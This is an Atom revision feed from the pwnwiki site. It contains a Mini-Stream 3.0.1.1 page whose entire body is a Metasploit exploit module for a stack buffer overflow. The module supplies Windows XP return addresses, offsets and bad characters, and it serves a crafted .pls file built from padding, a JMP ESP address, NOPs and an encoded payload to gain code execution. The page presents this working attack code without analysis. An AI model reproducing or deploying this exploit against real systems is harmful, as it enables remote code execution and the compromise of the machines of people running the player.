<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Mini-Stream_3.0.1.1%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>Mini-Stream 3.0.1.1緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Mini-Stream_3.0.1.1%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Mini-Stream_3.0.1.1%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-13T09:06:38Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Mini-Stream_3.0.1.1%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=714&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; ## # $Id: mini_stream.rb 14155 2011-11-04 08:20:43Z sinn3r $ ##  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and co...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Mini-Stream_3.0.1.1%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=714&amp;oldid=prev"/>
		<updated>2021-03-27T03:24:09Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; ## # $Id: mini_stream.rb 14155 2011-11-04 08:20:43Z sinn3r $ ##  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and co...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
##&lt;br /&gt;
# $Id: mini_stream.rb 14155 2011-11-04 08:20:43Z sinn3r $&lt;br /&gt;
##&lt;br /&gt;
&lt;br /&gt;
##&lt;br /&gt;
# This file is part of the Metasploit Framework and may be subject to&lt;br /&gt;
# redistribution and commercial restrictions. Please see the Metasploit&lt;br /&gt;
# Framework web site for more information on licensing and terms of use.&lt;br /&gt;
# http://metasploit.com/framework/&lt;br /&gt;
##&lt;br /&gt;
&lt;br /&gt;
require 'msf/core'&lt;br /&gt;
&lt;br /&gt;
class Metasploit3 &amp;lt; Msf::Exploit::Remote&lt;br /&gt;
 Rank = NormalRanking&lt;br /&gt;
&lt;br /&gt;
 include Msf::Exploit::Remote::HttpServer::HTML&lt;br /&gt;
&lt;br /&gt;
 def initialize(info = {})&lt;br /&gt;
  super(update_info(info,&lt;br /&gt;
   'Name' =&amp;gt; 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',&lt;br /&gt;
   'Description' =&amp;gt; %q{&lt;br /&gt;
     This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1&lt;br /&gt;
    By creating a specially crafted pls file, an an attacker may be able&lt;br /&gt;
    to execute arbitrary code.&lt;br /&gt;
   },&lt;br /&gt;
   'License' =&amp;gt; MSF_LICENSE,&lt;br /&gt;
   'Author' =&amp;gt;&lt;br /&gt;
    [&lt;br /&gt;
     'CORELAN Security Team ',&lt;br /&gt;
     'Ron Henry &amp;lt;rlh[at]ciphermonk.net&amp;gt;', # dijital1; Return address update&lt;br /&gt;
    ],&lt;br /&gt;
   'Version' =&amp;gt; '$Revision: 14155 $',&lt;br /&gt;
   'References' =&amp;gt;&lt;br /&gt;
    [&lt;br /&gt;
     [ 'OSVDB', '61341' ],&lt;br /&gt;
     [ 'URL', 'http://www.exploit-db.com/exploits/10745' ],&lt;br /&gt;
    ],&lt;br /&gt;
   'DefaultOptions' =&amp;gt;&lt;br /&gt;
    {&lt;br /&gt;
     'EXITFUNC' =&amp;gt; 'thread',&lt;br /&gt;
    },&lt;br /&gt;
   'Payload' =&amp;gt;&lt;br /&gt;
    {&lt;br /&gt;
     'Space' =&amp;gt; 3500,&lt;br /&gt;
     'BadChars' =&amp;gt; &amp;quot;\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30&amp;quot;,&lt;br /&gt;
     'StackAdjustment' =&amp;gt; -3500&lt;br /&gt;
    },&lt;br /&gt;
   'Platform' =&amp;gt; 'win',&lt;br /&gt;
   'Targets' =&amp;gt;&lt;br /&gt;
    [&lt;br /&gt;
     [&lt;br /&gt;
      'Windows XP SP3 ENG',&lt;br /&gt;
      {&lt;br /&gt;
       'Ret'    =&amp;gt; 0x7e429353,  # 0x7e429353 JMP ESP - USER32.dll&lt;br /&gt;
       'Offset' =&amp;gt; 17417&lt;br /&gt;
      }&lt;br /&gt;
     ],&lt;br /&gt;
     [&lt;br /&gt;
      'Windows XP SP2 ENG',&lt;br /&gt;
      {&lt;br /&gt;
       'Ret'    =&amp;gt; 0x7c941eed,  # 0x7c941eed JMP ESP - SHELL32.dll&lt;br /&gt;
       'Offset' =&amp;gt; 17417&lt;br /&gt;
      }&lt;br /&gt;
     ]&lt;br /&gt;
    ],&lt;br /&gt;
   'Privileged' =&amp;gt; false,&lt;br /&gt;
   'DisclosureDate' =&amp;gt; 'Dec 25 2009',&lt;br /&gt;
   'DefaultTarget' =&amp;gt; 0))&lt;br /&gt;
&lt;br /&gt;
  register_options(&lt;br /&gt;
   [&lt;br /&gt;
    OptString.new('URIPATH',  [ true,  'The URI to use for this exploit', 'msf.pls'])&lt;br /&gt;
   ], self.class)&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 def on_request_uri(cli, request)&lt;br /&gt;
  # Calculate the correct offset&lt;br /&gt;
  host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']&lt;br /&gt;
  host &amp;lt;&amp;lt; &amp;quot;:#{datastore['SRVPORT']}/&amp;quot;&lt;br /&gt;
  offset = target['Offset'] - host.length&lt;br /&gt;
&lt;br /&gt;
  # Construct our buffer&lt;br /&gt;
  sploit = rand_text_alpha(offset)&lt;br /&gt;
  sploit &amp;lt;&amp;lt; [target.ret].pack('V')&lt;br /&gt;
  sploit &amp;lt;&amp;lt; make_nops(32)&lt;br /&gt;
  sploit &amp;lt;&amp;lt; @p&lt;br /&gt;
&lt;br /&gt;
  print_status(&amp;quot;Sending malicous payload #{cli.peerhost}:#{cli.peerport}...&amp;quot;)&lt;br /&gt;
  send_response(cli, sploit, {'Content-Type'=&amp;gt;'application/pls+xml'})&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
 def exploit&lt;br /&gt;
  @p = payload.encoded&lt;br /&gt;
  super&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
end&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>